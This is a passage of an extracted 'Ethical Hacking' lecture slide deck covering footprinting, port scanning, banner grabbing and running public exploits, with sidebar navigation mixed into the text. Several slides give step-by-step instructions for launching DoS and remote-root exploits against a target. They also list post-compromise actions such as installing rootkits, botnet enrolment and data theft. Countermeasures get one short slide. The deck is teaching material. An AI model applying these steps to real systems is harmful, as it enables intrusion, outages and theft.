Techniques • Make sure you server php.ini file has register globals and allow url fopen disabled
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 43 / 56
44. Network Hacking
Ethical
Hacking &
Network Hacking
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking Techniques
Low Tech
Methods
High Tech
• Foot Printing
Methods
Countermeasures • Port Scanning
Web Hacking
Techniques • Banner Grabbing
Countermeasures
Network
• Searching for Vulnerabilities
Hacking
Techniques • Penetrating
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 44 / 56
45. Network Hacking Techniques
Ethical
Hacking &
Footprinting
Information
Security
AK Dhamija Footprinting
Introduction
• To hack a system the hacker must first know everything there is to know about it
Hacker • Gathering information about a computer system and the companies it belongs to
Password
Hacking
Low Tech Footprinting Steps
Methods
High Tech
Methods
• A hacker would start gathering information on the targets website. Things to look for are e-mails
and names
Countermeasures
• Get the IP address of the website
Web Hacking
Techniques
• Ping the server to see if it is up and running
Countermeasures • Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the
target website
Network
Hacking • You see the company e-mails, address, names, when the domain was created, when the domain
Techniques expires, the domain name servers, and more!
Countermeasures
Windows
• A hacker can also take advantage of search engines to search sites for data
Hacking • ”site : www.the − target − site.com” this will display every page that Google has of
the website
Linux Hacking • ”site : www.the − target − site.comemail” will list several emails that are
published on the website
Wireless • ”inurl : robots.txt” would look for a page called robots.txt, which displays all the
Hacking directories and pages on the website that they wish to keep anonymous from the search
engine spiders
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 45 / 56
46. Network Hacking Techniques
Ethical
Hacking &
Port Scanning
Information
Security
AK Dhamija
Port Scanning
Introduction
Hacker
• To detect the port’s listening services on server’s open ports so as to detect the vulnerabilities
• The Nmap Security Scanner is available for both Mac and Windows users:
Password http://nmap.org/download.html
Hacking
Low Tech
Methods
High Tech
Methods Port Scanning Steps
Countermeasures
• Choose a target and place it in the target box
Web Hacking
Techniques
• choose the ”Profile”
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 46 / 56
47. Network Hacking Techniques
Ethical
Hacking &
Port Scanning
Information
Security
AK Dhamija
Port Scanning Steps
• A sample scan result may look like
Introduction
Hacker
Password
Hacking
Low Tech
Methods
High Tech
Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
• List of some of the most popular ports/services on the internet
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
•
the hacker needs to also find out what operating system the server is running (Visiting a non-existent
References page gives 404 error page which shows the OS)
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 47 / 56
48. Network Hacking Techniques
Ethical
Hacking &
Banner Grabbing
Information
Security
AK Dhamija
Banner Grabbing
Introduction • To find out the software and its version,which is needed to search for vulnerability
Hacker
Password
Hacking
Low Tech
Banner Grabbing Steps
Methods
High Tech • Telnet into service port To figure out what software and version of the service
Methods
Countermeasures
• If you are using Windows Vista, then telnet is not installed by default, Use control panel - Programs
and Features - Turn Windows features on or off - Telnet Client to install
Web Hacking • If you found port 21 (ie ftp) open, then telnet www.targetsite.com 21 to find out FTP software
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
• Nmap’s full version detection option to get this information, if telnet doesn’t work
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 48 / 56
49. Network Hacking Techniques
Ethical
Hacking &
Searching for Vulnerabilities
Information
Security
AK Dhamija
Searching for Vulnerabilities
Introduction
Hacker • Search a couple vulnerability databases for an exploit
Password • If there’s an exploit available, run it against the server and take complete control
Hacking • Popular exploit databases are Milw0rm, SecurityFocus, osvdb
Low Tech
Methods
High Tech
• If there isn’t any, you can move onto another open port and try again on a different service.
Methods
Countermeasures Alternatively develop a ”0-day” exploit
• No one knows about the vulnerability, hundreds of websites can be hacked before the
Web Hacking vulnerability is discovered and patched
Techniques • The hacker could sell the vulnerability for thousands of dollars
Countermeasures • It shows that the hacker is very skillful and raises his ranks in the hacker community
Network
Hacking
Techniques
Countermeasures
Attacks used against discovered vulnerabilities
Windows • Denial-of-Service(DoS) :Send a flood of information to the target server causing it to use up all of
Hacking its resources, and in return pushing it offline, or deny requests to others
Linux Hacking
• Buffer Overflow(BoF) :The extra information overflows into other buffers causing them to be
overwritten with malicious code created by the hacker. Once this code is executed, the hacker can
Wireless receive full control of the server
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 49 / 56
50. Network Hacking Techniques
Ethical
Hacking &
Searching for Vulnerabilities
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking
Low Tech
Methods Types of Exploits
High Tech
Methods • Local Exploit :You must first have access and privileges on the machine. Local exploits are usually
Countermeasures used to escalate ones privileges to admin or root
Web Hacking • Remote Exploit :it isn’t run locally, but launched from anywhere across the internet
Techniques • A hacker usually has to use a combination of both remote and local exploits to gain full control of a
Countermeasures system. For example, the hacker may have been able to gain regular privileges with a remote exploit
Network attack, and then be able to escalate to root privileges with the help of a local exploit
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 50 / 56
51. Network Hacking Techniques
Ethical
Hacking &
Penetrating
Information
Security
AK Dhamija
Penetrating
• Running the exploits against the target and penetrating the server
Introduction
Hacker
Password
DOS php exploit: PHP http://milw0rm.com/exploits/2901
Hacking • Install PHP onto your computer. WAMP is a free web server that comes with PHP
Low Tech
Methods • Paste the PHP exploit into notepad or any word processor and save it as ”exploit.php”
High Tech
Methods • On line 13 of this exploit you will see: $address = gethostbyname(’192.168.1.3’); edit here the IP
Countermeasures address of the target
Web Hacking • Save this edited file into the PHP directory on your server that contains the PHP executable file. In
WAMP the directory would be C:wampbinphpphp5.2.5
Techniques
Countermeasures • To run it simply type in ”php exploit.php” and hit enter
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
• When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script
Linux Hacking kiddies with no programming knowledge wouldn’t be able to use them
Wireless
• At line 18 of this exploit , we $junk.=”../../../sun-tzu/../../../sun-tzu/../../../sun-tzu”; Just remove
this line and error will disappear
Hacking
• a DoS attack will be launched; the target website up until you exit the command screen
Malware
•
The site will begin to lag and it’ll take a long time to load pages. Eventually the server may go down
References completely
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 51 / 56
52. Network Hacking Techniques
Ethical
Hacking &
Penetrating
Information
Security
AK Dhamija
DOS perl exploit: http://milw0rm.com/exploits/6581
• Download and install the appropriate version of ActivePerl
Introduction • Edit the options like the target server and others as needed. Then save the file as ”exploit.pl”. As
Hacker you can see Pearl exploits begin with ”!/usr/bin/perl”
Password • Run the exploit by typing: ”perl exploit.pl”
Hacking
Low Tech
Methods
High Tech
Python, C/C++ on Linux,
Methods
Countermeasures • Python exploit: http://milw0rm.com/exploits/3523
Web Hacking • Most C/C++ exploit code is made to be compiled in Linux
Techniques • Save the remote root exploit http://milw0rm.com/exploits/269 as ”exploit.c”
Countermeasures
• Install a development package of all the libraries and headers needed to compile C/C++ scripts by
Network sudo apt-get install build-essential
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
•Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script
References worked, the hacker would now have root access to the server
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 52 / 56
53. Network Hacking Techniques
Ethical
Hacking &
Penetrating
Information
Security
AK Dhamija
C/C++ on Windows
Introduction
Hacker • To run in Windows, you can use Cygwin
Password
• Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer,
allowing you to run Linux scripts in windows
Hacking
Low Tech • Download Cygwin from http://www.cygwin.com/
Methods
High Tech
• Using the same exploit as the last example, save and move it into the ”C:cygwin” directory as
Methods ”exploit.c”
Countermeasures • In ”C:cygwin” directory do ”gcc exploit.c -o exploit”
Web Hacking • Run the file ”exploit.exe” simply type simply type ”./exploit”
Techniques
Countermeasures
Network
Hacking
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless • You get the root access to the target computer
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 53 / 56
54. Network Hacking Techniques
Ethical
Hacking &
Penetrating
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking root access
Low Tech
Methods Once you get root access , you can do
High Tech
Methods
• Add yourself as a permanent user for future access
Countermeasures • Add the server into your botnet collection so he could use it as a weapon against other servers
Web Hacking • Use it as a proxy to hack other websites
Techniques • Install a rootkit so he can come back and have full control over the server when needed
Countermeasures
• Constantly steel information as it comes
Network
Hacking
• Use the system to store illegal data
Techniques • Deface the website and sometimes the hacker will delete everything off of the server
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 54 / 56
55. Network Hacking Countermeasures
Ethical
Hacking &
Network Hacking
Information
Security
AK Dhamija
Introduction
Hacker
Password
Hacking Countermeasures
Low Tech
Methods
High Tech • Keep all your software up to date
Methods
Countermeasures • There will always be new vulnerabilities coming out, and your responsibility is to patch them
immediately after a patch comes out
Web Hacking
Techniques • Implement a firewall. This will keep most of the bad data out and good data in
Countermeasures
Network
• Install anti-virus software
Hacking • Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system
Techniques
Countermeasures
Windows
Hacking
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 55 / 56
56. References
Ethical
Hacking &
References
Information
Security
AK Dhamija
Introduction References
Hacker
Password • http://www.learn-how-to-hack.net
Hacking
Low Tech
Methods • http://www.MrCracker.com
High Tech
Methods
Countermeasures • http://hackthisway.com
Web Hacking
Techniques
Countermeasures Presentation available at
Network
Hacking http://akdhamija.webs.com/
Techniques
Countermeasures
Windows For any Clarification, mail me at
Hacking
dhamija.ak@gmail.com
Linux Hacking
Wireless
Hacking
Malware
References
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 56 / 56